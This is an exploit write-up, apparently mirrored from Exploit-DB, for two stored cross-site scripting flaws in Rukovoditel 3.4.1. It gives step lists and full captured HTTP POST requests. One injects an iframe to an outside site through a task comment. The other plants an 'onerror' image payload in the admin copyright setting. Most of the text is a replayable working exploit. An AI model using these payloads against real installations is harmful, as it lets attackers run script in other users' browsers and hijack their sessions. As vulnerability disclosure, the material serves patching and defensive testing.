Rukovoditel 3.4.1 – Multiple Stored XSS - 体验盒子

作者： Mirabbas Ağalarov
日期： 2023-07-03
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/51548/
Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs:Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
 ###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task
4. open task 
5. add comment as "<iframe src="https://14.rs"></iframe> "


POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=

===========================
 ###XSS-2###
===========================
1.go to admin account
2.go to configration => applicaton
3.Copyright Text set as "<img src=x onerror=alert(1)>"


POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"

ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"

Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"

ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"

ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"

<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"

english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"

America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"

10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"

m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"

m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"

2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"

0
-----------------------------12298384558648010343132232769--